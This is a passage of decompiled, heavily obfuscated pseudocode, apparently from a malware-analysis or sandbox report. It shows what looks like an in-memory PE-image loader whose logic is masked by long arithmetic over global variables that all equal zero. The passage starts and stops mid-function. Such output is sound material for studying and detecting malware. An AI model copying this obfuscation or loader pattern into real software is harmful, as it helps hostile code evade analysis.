														 *((intOrPtr*)( *_v72 + 0x34)) = _v24 - _t962 - _t963 *  *0x6da8125c + _t965 - _t966 - _t967 - _t968 *  *0x6da81260 *  *0x6da8125c *  *0x6da8125c - _t972 *  *0x6da8125c + _t974 + _t975 - _t976 + _t977 - _t978 + _t979 + _t980 - _t981 - _t982 - _t983 - _t984 - _t985 *  *0x6da8125c + _t987 - _t988 - _t989 - _t990 *  *0x6da81260 *  *0x6da8125c *  *0x6da8125c - _t994 *  *0x6da8125c + _t996 + _t997 - _t998 + _t999 - _t1000 + _t1001 + _t1002 - _t1003 - _t1004 - _t1005 - _t1006 - _t1007 *  *0x6da8125c + _t1009 - _t1010 - _t1011 - _t1012 *  *0x6da81260 *  *0x6da8125c *  *0x6da8125c - _t1016 *  *0x6da8125c + _t1018 + _t1019 - _t1020 + _t1021 - _t1022 + _t1023 + _t1024 - _t1025 - _t1026 - _t1027;
														_t2384 =  *0x6da81268; // 0x0
														_t1029 =  *0x6da81268; // 0x0
														_t2387 =  *0x6da81260; // 0x0
														_t1031 =  *0x6da8126c; // 0x0
														_t2389 =  *0x6da81260; // 0x0
														_t1033 =  *0x6da8125c; // 0x0
														_t2392 =  *0x6da81268; // 0x0
														_t1035 =  *0x6da81268; // 0x0
														_t2395 =  *0x6da81260; // 0x0
														_t1037 =  *0x6da8126c; // 0x0
														_t2397 =  *0x6da81260; // 0x0
														_t1039 =  *0x6da8125c; // 0x0
														_t1041 =  *0x6da81268; // 0x0
														_t2401 =  *0x6da81260; // 0x0
														_t1044 =  *0x6da81268; // 0x0
														_t2403 =  *0x6da81260; // 0x0
														_t1047 =  *0x6da81268; // 0x0
														_t2405 =  *0x6da81260; // 0x0
														_t1050 =  *0x6da81268; // 0x0
														_t2407 =  *0x6da81260; // 0x0
														_t1053 = E6DA2FBA0(_a4, _a8 - _t1041 *  *0x6da8126c *  *0x6da81260 - _t2401 *  *0x6da81260 - _t1044 *  *0x6da8126c *  *0x6da81260 - _t2403 *  *0x6da81260 - _t1047 *  *0x6da8126c *  *0x6da81260 - _t2405 *  *0x6da81260 - _t1050 *  *0x6da8126c *  *0x6da81260 - _t2407 *  *0x6da81260, _v80, _v72 - (_t2384 *  *0x6da81260 << 6) - (_t1029 << 6) - (_t2387 << 6) - (_t1031 << 6) - (_t2389 *  *0x6da8125c << 6) + (_t1033 << 6) - (_t2392 *  *0x6da81260 << 6) - (_t1035 << 6) - (_t2395 << 6) - (_t1037 << 6) - (_t2397 *  *0x6da8125c << 6) + (_t1039 << 6)); // executed
														_t4341 = _t4338 + 0x30;
														if(_t1053 != 0) {
															_t2410 =  *0x6da81270; // 0x0
															_t3790 =  *0x6da81260; // 0x0
															_t2412 =  *0x6da81270; // 0x0
															_t3792 =  *0x6da81260; // 0x0
															_t1078 =  *((intOrPtr*)( *_v72 + 0x34)) -  *((intOrPtr*)(_v80 + 0x34)) -  *0x6da8125c +  *0x6da81264 +  *0x6da81270 +  *0x6da8126c -  *0x6da81268 - _t2410 *  *0x6da8125c - _t3790 *  *0x6da81260 -  *0x6da8125c -  *0x6da81260 -  *0x6da81270 +  *0x6da8126c -  *0x6da8125c +  *0x6da81264 +  *0x6da81270 +  *0x6da8126c -  *0x6da81268 - _t2412 *  *0x6da8125c - _t3792 *  *0x6da81260 -  *0x6da8125c -  *0x6da81260 -  *0x6da81270 +  *0x6da8126c;
															_v76 = _t1078;
															if(_t1078 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																_t1216 =  *0x6da81264; // 0x0
																_t4001 =  *0x6da81270; // 0x0
																_t1218 =  *0x6da8125c; // 0x0
																_t2569 =  *0x6da81260; // 0x0
																_t4004 =  *0x6da8126c; // 0x0
																_t2571 =  *0x6da8126c; // 0x0
																_t4006 =  *0x6da81268; // 0x0
																_t2574 =  *0x6da81264; // 0x0
																_t4008 =  *0x6da81264; // 0x0
																_t2576 =  *0x6da81270; // 0x0
																_t4010 =  *0x6da8125c; // 0x0
																_t1239 =  *0x6da81260; // 0x0
																_t2579 =  *0x6da8126c; // 0x0
																_t1241 =  *0x6da8126c; // 0x0
																_t2581 =  *0x6da81268; // 0x0
																_t1244 =  *0x6da81264; // 0x0
																_t2583 =  *0x6da8125c; // 0x0
																_t1246 =  *0x6da8125c; // 0x0
																_t2585 =  *0x6da81260; // 0x0
																_t1248 =  *0x6da8126c; // 0x0
																_t2589 =  *0x6da81264; // 0x0
																_t1251 =  *0x6da8125c; // 0x0
																_t2591 =  *0x6da81268; // 0x0
																_t1254 =  *0x6da8126c; // 0x0
																_t2593 =  *0x6da81268; // 0x0
																_t1256 =  *0x6da81270; // 0x0
																_t2599 =  *0x6da81270; // 0x0
																_t1258 =  *0x6da81270; // 0x0
																_t2602 =  *0x6da81260; // 0x0
																_t1260 =  *0x6da81260; // 0x0
																_t2606 =  *0x6da8125c; // 0x0
																_t1262 =  *0x6da8125c; // 0x0
																_t2608 =  *0x6da81260; // 0x0
																_t1264 =  *0x6da8126c; // 0x0
																_t2612 =  *0x6da81264; // 0x0
																_t1267 =  *0x6da8125c; // 0x0
																_t2614 =  *0x6da81268; // 0x0
																_t1270 =  *0x6da8126c; // 0x0
																_t2616 =  *0x6da81268; // 0x0
																_t1272 =  *0x6da81270; // 0x0
																_t2622 =  *0x6da81270; // 0x0
																_t1274 =  *0x6da81270; // 0x0
																_t2625 =  *0x6da81260; // 0x0
																_t1276 =  *0x6da81260; // 0x0
																_t2629 =  *0x6da8125c; // 0x0
																_t1278 =  *0x6da8125c; // 0x0
																_t2631 =  *0x6da81260; // 0x0
																_t1280 =  *0x6da8126c; // 0x0
																_t2635 =  *0x6da81264; // 0x0
																_t1283 =  *0x6da8125c; // 0x0
																_t2637 =  *0x6da81268; // 0x0
																_t1286 =  *0x6da8126c; // 0x0
																_t2639 =  *0x6da81268; // 0x0
																_t1288 =  *0x6da81270; // 0x0
																_t2645 =  *0x6da81270; // 0x0
																_t1290 =  *0x6da81270; // 0x0
																_t2648 =  *0x6da81260; // 0x0
																_t1292 =  *0x6da81260; // 0x0
																_t2652 =  *0x6da8125c; // 0x0
																_t1294 =  *0x6da8125c; // 0x0
																_t2654 =  *0x6da81260; // 0x0
																_t1296 =  *0x6da8126c; // 0x0
																_t2658 =  *0x6da81264; // 0x0
																_t1299 =  *0x6da8125c; // 0x0
																_t2660 =  *0x6da81268; // 0x0
																_t1302 =  *0x6da8126c; // 0x0
																_t2662 =  *0x6da81268; // 0x0
																_t1304 =  *0x6da81270; // 0x0
																_t2668 =  *0x6da81270; // 0x0
																_t1306 =  *0x6da81270; // 0x0
																_t2671 =  *0x6da81260; // 0x0
																_t1308 =  *0x6da81260; // 0x0
																_t2675 =  *0x6da8125c; // 0x0
																_t1310 =  *0x6da8125c; // 0x0
																_t2677 =  *0x6da81260; // 0x0
																_t1312 =  *0x6da8126c; // 0x0
																_t2681 =  *0x6da81264; // 0x0
																_t1315 =  *0x6da8125c; // 0x0
																_t2683 =  *0x6da81268; // 0x0
																_t1318 =  *0x6da8126c; // 0x0
																_t2685 =  *0x6da81268; // 0x0
																_t1320 =  *0x6da81270; // 0x0
																_t2691 =  *0x6da81270; // 0x0
																_t1322 =  *0x6da81270; // 0x0
																_t2694 =  *0x6da81260; // 0x0
																_t1324 =  *0x6da81260; // 0x0
																_t1326 = E6DA35230(_v72 - (_t2583 << 6) - (_t1246 << 6) - (_t2585 *  *0x6da81264 *  *0x6da8125c << 6) - (_t1248 *  *0x6da81270 << 6) + (_t2589 << 6) + (_t1251 *  *0x6da81264 << 6) - (_t2591 << 6) + (_t1254 << 6) - (_t2593 *  *0x6da81264 *  *0x6da8126c *  *0x6da81264 *  *0x6da81268 << 6) - (_t1256 << 6) - (_t2599 *  *0x6da8126c << 6) + (_t1258 << 6) + (_t2602 *  *0x6da81268 *  *0x6da81268 << 6) + (_t1260 << 6) - (_t2606 << 6) - (_t1262 << 6) - (_t2608 *  *0x6da81264 *  *0x6da8125c << 6) - (_t1264 *  *0x6da81270 << 6) + (_t2612 << 6) + (_t1267 *  *0x6da81264 << 6) - (_t2614 << 6) + (_t1270 << 6) - (_t2616 *  *0x6da81264 *  *0x6da8126c *  *0x6da81264 *  *0x6da81268 << 6) - (_t1272 << 6) - (_t2622 *  *0x6da8126c << 6) + (_t1274 << 6) + (_t2625 *  *0x6da81268 *  *0x6da81268 << 6) + (_t1276 << 6) - (_t2629 << 6) - (_t1278 << 6) - (_t2631 *  *0x6da81264 *  *0x6da8125c << 6) - (_t1280 *  *0x6da81270 << 6) + (_t2635 << 6) + (_t1283 *  *0x6da81264 << 6) - (_t2637 << 6) + (_t1286 << 6) - (_t2639 *  *0x6da81264 *  *0x6da8126c *  *0x6da81264 *  *0x6da81268 << 6) - (_t1288 << 6) - (_t2645 *  *0x6da8126c << 6) + (_t1290 << 6) + (_t2648 *  *0x6da81268 *  *0x6da81268 << 6) + (_t1292 << 6) - (_t2652 << 6) - (_t1294 << 6) - (_t2654 *  *0x6da81264 *  *0x6da8125c << 6) - (_t1296 *  *0x6da81270 << 6) + (_t2658 << 6) + (_t1299 *  *0x6da81264 << 6) - (_t2660 << 6) + (_t1302 << 6) - (_t2662 *  *0x6da81264 *  *0x6da8126c *  *0x6da81264 *  *0x6da81268 << 6) - (_t1304 << 6) - (_t2668 *  *0x6da8126c << 6) + (_t1306 << 6) + (_t2671 *  *0x6da81268 *  *0x6da81268 << 6) + (_t1308 << 6) - (_t2675 << 6) - (_t1310 << 6) - (_t2677 *  *0x6da81264 *  *0x6da8125c << 6) - (_t1312 *  *0x6da81270 << 6) + (_t2681 << 6) + (_t1315 *  *0x6da81264 << 6) - (_t2683 << 6) + (_t1318 << 6) - (_t2685 *  *0x6da81264 *  *0x6da8126c *  *0x6da81264 *  *0x6da81268 << 6) - (_t1320 << 6) - (_t2691 *  *0x6da8126c << 6) + (_t1322 << 6) + (_t2694 *  *0x6da81268 *  *0x6da81268 << 6) + (_t1324 << 6), _t4010 *  *0x6da81260 *  *0x6da81264 *  *0x6da81270 + _t1218 *  *0x6da81260 *  *0x6da81264 *  *0x6da81270 + _v76 - _t1216 *  *0x6da81264 +  *0x6da8125c - _t4001 *  *0x6da8126c *  *0x6da8126c -  *0x6da81260 +  *0x6da81270 +  *0x6da81268 +  *0x6da81270 +  *0x6da81264 + _t2569 *  *0x6da81260 -  *0x6da8126c -  *0x6da81270 - _t4004 *  *0x6da81260 - _t2571 *  *0x6da8125c *  *0x6da81270 +  *0x6da81268 - _t4006 *  *0x6da81264 + _t2574 *  *0x6da81268 - _t4008 *  *0x6da81264 +  *0x6da8125c - _t2576 *  *0x6da8126c *  *0x6da8126c -  *0x6da81260 +  *0x6da81270 +  *0x6da81268 +  *0x6da81270 +  *0x6da81264 + _t1239 *  *0x6da81260 -  *0x6da8126c -  *0x6da81270 - _t2579 *  *0x6da81260 - _t1241 *  *0x6da8125c *  *0x6da81270 +  *0x6da81268 - _t2581 *  *0x6da81264 + _t1244 *  *0x6da81268);
																_t4341 = _t4341 + 8;
																_t2698 =  *0x6da81270; // 0x0
																_t4096 =  *0x6da81260; // 0x0
																_t2700 =  *0x6da81268; // 0x0
																_t4098 =  *0x6da8125c; // 0x0
																_t2702 =  *0x6da8126c; // 0x0
																_t4101 =  *0x6da81270; // 0x0
																_t1337 =  *0x6da81270; // 0x0
																_t4103 =  *0x6da81260; // 0x0
																_t1339 =  *0x6da81268; // 0x0
																_t4105 =  *0x6da8125c; // 0x0
																_t1341 =  *0x6da8126c; // 0x0
																_t2719 =  *0x6da81270; // 0x0
																_t4108 =  *0x6da81270; // 0x0
																_t2721 =  *0x6da81260; // 0x0
																_t4110 =  *0x6da81268; // 0x0
																_t2723 =  *0x6da8125c; // 0x0
																_t4112 =  *0x6da8126c; // 0x0
																_t1358 =  *0x6da81270; // 0x0
																_t2726 =  *0x6da81270; // 0x0
																_t1360 =  *0x6da81260; // 0x0
																_t2728 =  *0x6da81268; // 0x0
																_t1362 =  *0x6da8125c; // 0x0
																_t2730 =  *0x6da8126c; // 0x0
																_t4129 =  *0x6da81270; // 0x0
																 *((intOrPtr*)(_v72 + 0x18)) = _t2730 *  *0x6da8126c + _t4112 *  *0x6da8126c + _t1341 *  *0x6da8126c + _t2702 *  *0x6da8126c + _t1326 - _t2698 *  *0x6da8126c -  *0x6da8126c +  *0x6da81264 - _t4096 *  *0x6da8125c -  *0x6da81270 -  *0x6da81270 - _t2700 *  *0x6da8125c -  *0x6da81264 + _t4098 *  *0x6da8125c *  *0x6da8125c +  *0x6da81270 -  *0x6da81270 +  *0x6da8126c -  *0x6da81260 - _t4101 *  *0x6da81270 - _t1337 *  *0x6da8126c -  *0x6da8126c +  *0x6da81264 - _t4103 *  *0x6da8125c -  *0x6da81270 -  *0x6da81270 - _t1339 *  *0x6da8125c -  *0x6da81264 + _t4105 *  *0x6da8125c *  *0x6da8125c +  *0x6da81270 -  *0x6da81270 +  *0x6da8126c -  *0x6da81260 - _t2719 *  *0x6da81270 - _t4108 *  *0x6da8126c -  *0x6da8126c +  *0x6da81264 - _t2721 *  *0x6da8125c -  *0x6da81270 -  *0x6da81270 - _t4110 *  *0x6da8125c -  *0x6da81264 + _t2723 *  *0x6da8125c *  *0x6da8125c +  *0x6da81270 -  *0x6da81270 +  *0x6da8126c -  *0x6da81260 - _t1358 *  *0x6da81270 - _t2726 *  *0x6da8126c -  *0x6da8126c +  *0x6da81264 - _t1360 *  *0x6da8125c -  *0x6da81270 -  *0x6da81270 - _t2728 *  *0x6da8125c -  *0x6da81264 + _t1362 *  *0x6da8125c *  *0x6da8125c +  *0x6da81270 -  *0x6da81270 +  *0x6da8126c -  *0x6da81260 - _t4129 *  *0x6da81270;
															}
															_t3794 =  *0x6da81270; // 0x0
															_t1079 =  *0x6da8126c; // 0x0
															_t2415 =  *0x6da8126c; // 0x0
															_t1082 =  *0x6da81268; // 0x0
															_t2418 =  *0x6da81260; // 0x0
															_t1084 =  *0x6da8126c; // 0x0
															_t2420 =  *0x6da81270; // 0x0
															_t1086 =  *0x6da8126c; // 0x0
															_t2422 =  *0x6da8126c; // 0x0
															_t1089 =  *0x6da81268; // 0x0
															_t2425 =  *0x6da81260; // 0x0
															_t1091 =  *0x6da8126c; // 0x0
															_t2427 =  *0x6da81270; // 0x0
															_t1093 =  *0x6da8126c; // 0x0
															_t2429 =  *0x6da8126c; // 0x0
															_t1096 =  *0x6da81268; // 0x0
															_t2432 =  *0x6da81260; // 0x0
															_t1098 =  *0x6da8126c; // 0x0
															_t1100 = E6DA36170((_t3794 << 6) + _v72 - (_t1079 *  *0x6da8125c << 6) - (_t2415 *  *0x6da8126c << 6) - (_t1082 << 6) + (_t2418 << 6) - (_t1084 << 6) + (_t2420 << 6) - (_t1086 *  *0x6da8125c << 6) - (_t2422 *  *0x6da8126c << 6) - (_t1089 << 6) + (_t2425 << 6) - (_t1091 << 6) + (_t2427 << 6) - (_t1093 *  *0x6da8125c << 6) - (_t2429 *  *0x6da8126c << 6) - (_t1096 << 6) + (_t2432 << 6) - (_t1098 << 6));
															_t4342 = _t4341 + 4;
															if(_t1100 != 0) {
																_t2434 =  *0x6da81260; // 0x0
																_t1101 =  *0x6da81260; // 0x0
																_t2436 =  *0x6da81268; // 0x0
																_t1103 =  *0x6da8126c; // 0x0
																_t2439 =  *0x6da81268; // 0x0
																_t1105 =  *0x6da81260; // 0x0
																_t2441 =  *0x6da81268; // 0x0
																_t1107 =  *0x6da81260; // 0x0
																_t2443 =  *0x6da81260; // 0x0
																_t1109 =  *0x6da81268; // 0x0
																_t2445 =  *0x6da8126c; // 0x0
																_t1112 =  *0x6da81268; // 0x0
																_t2447 =  *0x6da81260; // 0x0
																_t1114 =  *0x6da81268; // 0x0
																_t2449 =  *0x6da81260; // 0x0
																_t1116 =  *0x6da81260; // 0x0
																_t2451 =  *0x6da81268; // 0x0
																_t1118 =  *0x6da8126c; // 0x0
																_t2454 =  *0x6da81268; // 0x0
																_t1120 =  *0x6da81260; // 0x0
																_t2456 =  *0x6da81268; // 0x0
																_t1122 = E6DA31470(_v72 - (_t2434 << 6) + (_t1101 << 6) - (_t2436 *  *0x6da8125c << 6) + (_t1103 << 6) - (_t2439 << 6) - (_t1105 << 6) - (_t2441 << 6) - (_t1107 << 6) + (_t2443 << 6) - (_t1109 *  *0x6da8125c << 6) + (_t2445 << 6) - (_t1112 << 6) - (_t2447 << 6) - (_t1114 << 6) - (_t2449 << 6) + (_t1116 << 6) - (_t2451 *  *0x6da8125c << 6) + (_t1118 << 6) - (_t2454 << 6) - (_t1120 << 6) - (_t2456 << 6)); // executed
																_t4343 = _t4342 + 4;
																if(_t1122 != 0) {
																	_t3836 =  *0x6da81264; // 0x0
																	_t2458 =  *0x6da8126c; // 0x0
																	_t3838 =  *0x6da81264; // 0x0
																	_t2460 =  *0x6da8126c; // 0x0
																	_t3840 =  *0x6da81270; // 0x0
																	_t2462 =  *0x6da81260; // 0x0
																	_t3842 =  *0x6da8125c; // 0x0
																	_t2464 =  *0x6da8126c; // 0x0
																	_t3844 =  *0x6da8126c; // 0x0
																	_t2468 =  *0x6da8126c; // 0x0
																	_t3846 =  *0x6da81260; // 0x0
																	_t2470 =  *0x6da81264; // 0x0
																	_t3848 =  *0x6da81268; // 0x0
																	_t2472 =  *0x6da8125c; // 0x0
																	_t3851 =  *0x6da8126c; // 0x0
																	_t2475 =  *0x6da81268; // 0x0
																	_t3855 =  *0x6da81268; // 0x0
																	_t2478 =  *0x6da8126c; // 0x0
																	_t3857 =  *0x6da81268; // 0x0
																	_t2480 =  *0x6da81270; // 0x0
																	_t3860 =  *0x6da81260; // 0x0
																	_t2483 =  *0x6da81264; // 0x0
																	_t3862 =  *0x6da8126c; // 0x0
																	_t2485 =  *0x6da81264; // 0x0
																	_t3864 =  *0x6da8126c; // 0x0
																	_t2487 =  *0x6da81270; // 0x0
																	_t3866 =  *0x6da81260; // 0x0
																	_t2489 =  *0x6da8125c; // 0x0
																	_t3868 =  *0x6da8126c; // 0x0
																	_t2491 =  *0x6da8126c; // 0x0
																	_t3872 =  *0x6da8126c; // 0x0
																	_t2493 =  *0x6da81260; // 0x0
																	_t3874 =  *0x6da81264; // 0x0
																	_t2495 =  *0x6da81268; // 0x0
																	_t3876 =  *0x6da8125c; // 0x0
																	_t2498 =  *0x6da8126c; // 0x0
																	_t3879 =  *0x6da81268; // 0x0
																	_t2502 =  *0x6da81268; // 0x0
																	_t3882 =  *0x6da8126c; // 0x0
																	_t2504 =  *0x6da81268; // 0x0
																	_t3884 =  *0x6da81270; // 0x0
																	_t2507 =  *0x6da81260; // 0x0
																	_t1166 = E6DA34BD0(_v72 - (_t3836 << 6) + (_t2458 << 6) + (_t3838 << 6) - (_t2460 << 6) + (_t3840 << 6) - (_t2462 << 6) + (_t3842 << 6) - (_t2464 *  *0x6da8125c *  *0x6da81260 << 6) - (_t3844 << 6) + (_t2468 << 6) + (_t3846 << 6) - (_t2470 << 6) + (_t3848 *  *0x6da81264 << 6) + (_t2472 *  *0x6da81264 << 6) - (_t3851 *  *0x6da81268 *  *0x6da81260 << 6) - (_t2475 *  *0x6da81260 << 6) - (_t3855 << 6) - (_t2478 << 6) - (_t3857 *  *0x6da81264 << 6) + (_t2480 *  *0x6da8125c << 6) - (_t3860 << 6) - (_t2483 << 6) + (_t3862 << 6) + (_t2485 << 6) - (_t3864 << 6) + (_t2487 << 6) - (_t3866 << 6) + (_t2489 << 6) - (_t3868 *  *0x6da8125c *  *0x6da81260 << 6) - (_t2491 << 6) + (_t3872 << 6) + (_t2493 << 6) - (_t3874 << 6) + (_t2495 *  *0x6da81264 << 6) + (_t3876 *  *0x6da81264 << 6) - (_t2498 *  *0x6da81268 *  *0x6da81260 << 6) - (_t3879 *  *0x6da81260 << 6) - (_t2502 << 6) - (_t3882 << 6) - (_t2504 *  *0x6da81264 << 6) + (_t3884 *  *0x6da8125c << 6) - (_t2507 << 6));
																	_t4343 = _t4343 + 4;
																	if(_t1166 != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *((intOrPtr*)(_v72 + 0x38)) = 0;
																			L47:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			_t1170 =  *0x6da8126c; // 0x0
																			_t2512 =  *0x6da81270; // 0x0
																			_t1172 =  *0x6da81268; // 0x0
																			_t2515 =  *0x6da81270; // 0x0
																			_t1176 =  *0x6da8126c; // 0x0
																			_t2518 =  *0x6da8126c; // 0x0
																			_t1178 =  *0x6da81270; // 0x0
																			_t2520 =  *0x6da81268; // 0x0
																			_t1181 =  *0x6da81270; // 0x0
																			_t2524 =  *0x6da8126c; // 0x0
																			_t1184 =  *0x6da8126c; // 0x0
																			_t2526 =  *0x6da81270; // 0x0
																			_t1186 =  *0x6da81268; // 0x0
																			_t2529 =  *0x6da81270; // 0x0
																			_t1190 =  *0x6da8126c; // 0x0
																			_t2532 =  *0x6da8126c; // 0x0
																			_t1192 =  *0x6da81270; // 0x0
																			_t2534 =  *0x6da81268; // 0x0
																			_t1195 =  *0x6da81270; // 0x0
																			_t2538 =  *0x6da8126c; // 0x0
																			_t1198 =  *0x6da8126c; // 0x0
																			_t2540 =  *0x6da81270; // 0x0
																			_t1200 =  *0x6da81268; // 0x0
																			_t2543 =  *0x6da81270; // 0x0
																			_t1204 =  *0x6da8126c; // 0x0
																			_t2546 =  *0x6da8126c; // 0x0
																			_t1206 =  *0x6da81270; // 0x0
																			_t2548 =  *0x6da81268; // 0x0
																			_t1209 =  *0x6da81270; // 0x0
																			_t2552 =  *0x6da8126c; // 0x0
																			 *((intOrPtr*)(_v72 + 0x38)) = _v24 +  *((intOrPtr*)( *_v72 + 0x28)) +  *0x6da81264 +  *0x6da81264 -  *0x6da81270 - _t1170 *  *0x6da81260 +  *0x6da81260 + _t2512 *  *0x6da81264 *  *0x6da81270 - _t1172 *  *0x6da81270 *  *0x6da81270 *  *0x6da81260 -  *0x6da81270 -  *0x6da81270 +  *0x6da81260 +  *0x6da81270 +  *0x6da8126c +  *0x6da81268 - _t2515 *  *0x6da81260 *  *0x6da81264 -  *0x6da81270 - _t1176 *  *0x6da8126c -  *0x6da81268 +  *0x6da81270 +  *0x6da81264 +  *0x6da81264 -  *0x6da81270 - _t2518 *  *0x6da81260 +  *0x6da81260 + _t1178 *  *0x6da81264 *  *0x6da81270 - _t2520 *  *0x6da81270 *  *0x6da81270 *  *0x6da81260 -  *0x6da81270 -  *0x6da81270 +  *0x6da81260 +  *0x6da81270 +  *0x6da8126c +  *0x6da81268 - _t1181 *  *0x6da81260 *  *0x6da81264 -  *0x6da81270 - _t2524 *  *0x6da8126c -  *0x6da81268 +  *0x6da81270 +  *0x6da81264 +  *0x6da81264 -  *0x6da81270 - _t1184 *  *0x6da81260 +  *0x6da81260 + _t2526 *  *0x6da81264 *  *0x6da81270 - _t1186 *  *0x6da81270 *  *0x6da81270 *  *0x6da81260 -  *0x6da81270 -  *0x6da81270 +  *0x6da81260 +  *0x6da81270 +  *0x6da8126c +  *0x6da81268 - _t2529 *  *0x6da81260 *  *0x6da81264 -  *0x6da81270 - _t1190 *  *0x6da8126c -  *0x6da81268 +  *0x6da81270 +  *0x6da81264 +  *0x6da81264 -  *0x6da81270 - _t2532 *  *0x6da81260 +  *0x6da81260 + _t1192 *  *0x6da81264 *  *0x6da81270 - _t2534 *  *0x6da81270 *  *0x6da81270 *  *0x6da81260 -  *0x6da81270 -  *0x6da81270 +  *0x6da81260 +  *0x6da81270 +  *0x6da8126c +  *0x6da81268 - _t1195 *  *0x6da81260 *  *0x6da81264 -  *0x6da81270 - _t2538 *  *0x6da8126c -  *0x6da81268 +  *0x6da81270 +  *0x6da81264 +  *0x6da81264 -  *0x6da81270 - _t1198 *  *0x6da81260 +  *0x6da81260 + _t2540 *  *0x6da81264 *  *0x6da81270 - _t1200 *  *0x6da81270 *  *0x6da81270 *  *0x6da81260 -  *0x6da81270 -  *0x6da81270 +  *0x6da81260 +  *0x6da81270 +  *0x6da8126c +  *0x6da81268 - _t2543 *  *0x6da81260 *  *0x6da81264 -  *0x6da81270 - _t1204 *  *0x6da8126c -  *0x6da81268 +  *0x6da81270 +  *0x6da81264 +  *0x6da81264 -  *0x6da81270 - _t2546 *  *0x6da81260 +  *0x6da81260 + _t1206 *  *0x6da81264 *  *0x6da81270 - _t2548 *  *0x6da81270 *  *0x6da81270 *  *0x6da81260 -  *0x6da81270 -  *0x6da81270 +  *0x6da81260 +  *0x6da81270 +  *0x6da8126c +  *0x6da81268 - _t1209 *  *0x6da81260 *  *0x6da81264 -  *0x6da81270 - _t2552 *  *0x6da8126c -  *0x6da81268 +  *0x6da81270;
																		} else {
																			 *0x6da83d70 = _v24 +  *((intOrPtr*)( *_v72 + 0x28)) +  *0x6da81264 -  *0x6da81260 +  *0x6da8125c +  *0x6da81264 -  *0x6da81260 +  *0x6da8125c;
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																		}
																		goto L47;
																	}
																	goto L48;
																}
																goto L48;
															} else {
																L48:
																E6DA3AFA0(_v72);
																return 0;
															}
														}
														goto L48;
													}
													goto L48;
												}
												_t2737 =  *0x6da81264; // 0x0
												_t4131 =  *0x6da8125c; // 0x0
												_t81 = _t4131 + 0x8000; // 0x8000
												_t2739 =  *0x6da81268; // 0x0
												_t4132 =  *0x6da81270; // 0x0
												_t2741 =  *0x6da8126c; // 0x0
												_t4134 =  *0x6da81260; // 0x0
												_t1372 =  *0x6da81268; // 0x0
												_t2743 =  *0x6da81264; // 0x0
												_t4142 =  *0x6da81268; // 0x0
												_t1374 =  *0x6da81270; // 0x0
												_t4144 =  *0x6da8126c; // 0x0
												_t1376 =  *0x6da81260; // 0x0
												_t2750 =  *0x6da81268; // 0x0
												_t4146 =  *0x6da81264; // 0x0
												_t1384 =  *0x6da81268; // 0x0
												_t2752 =  *0x6da81270; // 0x0
												_t1386 =  *0x6da8126c; // 0x0
												_t2754 =  *0x6da81260; // 0x0
												_t4153 =  *0x6da81268; // 0x0
												_t1388 =  *0x6da81264; // 0x0
												_t2762 =  *0x6da81268; // 0x0
												_t4155 =  *0x6da81270; // 0x0
												_t2764 =  *0x6da8126c; // 0x0
												_t4157 =  *0x6da81260; // 0x0
												_t1395 =  *0x6da81268; // 0x0
												_t2766 =  *0x6da81264; // 0x0
												_t4165 =  *0x6da81268; // 0x0
												_t1397 =  *0x6da81270; // 0x0
												_t4167 =  *0x6da8126c; // 0x0
												_t1399 =  *0x6da81260; // 0x0
												_t2773 =  *0x6da81268; // 0x0
												_t4169 =  *0x6da81264; // 0x0
												_t1407 =  *0x6da81268; // 0x0
												_t2775 =  *0x6da81270; // 0x0
												_t1409 =  *0x6da8126c; // 0x0
												_t2777 =  *0x6da81260; // 0x0
												_t4176 =  *0x6da81268; // 0x0
												_a16(_v24, 0, _t2777 *  *0x6da81260 *  *0x6da81260 + _t4169 *  *0x6da81264 + _t1399 *  *0x6da81260 *  *0x6da81260 + _t2766 *  *0x6da81264 + _t4157 *  *0x6da81260 *  *0x6da81260 + _t1388 *  *0x6da81264 + _t2754 *  *0x6da81260 *  *0x6da81260 + _t4146 *  *0x6da81264 + _t1376 *  *0x6da81260 *  *0x6da81260 + _t2743 *  *0x6da81264 + _t4134 *  *0x6da81260 *  *0x6da81260 + _t2737 *  *0x6da81264 + _t81 + _t2739 *  *0x6da8125c + _t4132 *  *0x6da81270 - _t2741 *  *0x6da81264 +  *0x6da81270 +  *0x6da81268 +  *0x6da81268 + _t1372 *  *0x6da81264 +  *0x6da8125c + _t4142 *  *0x6da8125c + _t1374 *  *0x6da81270 - _t4144 *  *0x6da81264 +  *0x6da81270 +  *0x6da81268 +  *0x6da81268 + _t2750 *  *0x6da81264 +  *0x6da8125c + _t1384 *  *0x6da8125c + _t2752 *  *0x6da81270 - _t1386 *  *0x6da81264 +  *0x6da81270 +  *0x6da81268 +  *0x6da81268 + _t4153 *  *0x6da81264 +  *0x6da8125c + _t2762 *  *0x6da8125c + _t4155 *  *0x6da81270 - _t2764 *  *0x6da81264 +  *0x6da81270 +  *0x6da81268 +  *0x6da81268 + _t1395 *  *0x6da81264 +  *0x6da8125c + _t4165 *  *0x6da8125c + _t1397 *  *0x6da81270 - _t4167 *  *0x6da81264 +  *0x6da81270 +  *0x6da81268 +  *0x6da81268 + _t2773 *  *0x6da81264 +  *0x6da8125c + _t1407 *  *0x6da8125c + _t2775 *  *0x6da81270 - _t1409 *  *0x6da81264 +  *0x6da81270 +  *0x6da81268 +  *0x6da81268 + _t4176 *  *0x6da81264, _a32);
												return 0;
											}
											_t4178 =  *0x6da8126c; // 0x0
											_t1414 =  *0x6da8125c; // 0x0
											_t73 = _t4178 + 4; // 0x4
											_t4179 =  *0x6da81268; // 0x0
											_t1415 =  *0x6da81268; // 0x0
											_t4181 =  *0x6da8126c; // 0x0
											_t1417 =  *0x6da81260; // 0x0
											_t2798 =  *0x6da81268; // 0x0
											_t1419 =  *0x6da81268; // 0x0
											_t2800 =  *0x6da8126c; // 0x0
											_t4201 =  *0x6da81260; // 0x0
											_t1421 =  *0x6da8126c; // 0x0
											_t4203 =  *0x6da81264; // 0x0
											_t1423 =  *0x6da81268; // 0x0
											_t4205 =  *0x6da81270; // 0x0
											_t1426 =  *0x6da8126c; // 0x0
											_t4208 =  *0x6da81260; // 0x0
											_t1428 =  *0x6da8126c; // 0x0
											_t1430 =  *0x6da8126c; // 0x0
											_t4219 =  *0x6da8126c; // 0x0
											_t4222 =  *0x6da81264; // 0x0
											_t4224 =  *0x6da8126c; // 0x0
											_t1445 =  *0x6da8126c; // 0x0
											_t1448 =  *0x6da81264; // 0x0
											_t1450 =  *0x6da8126c; // 0x0
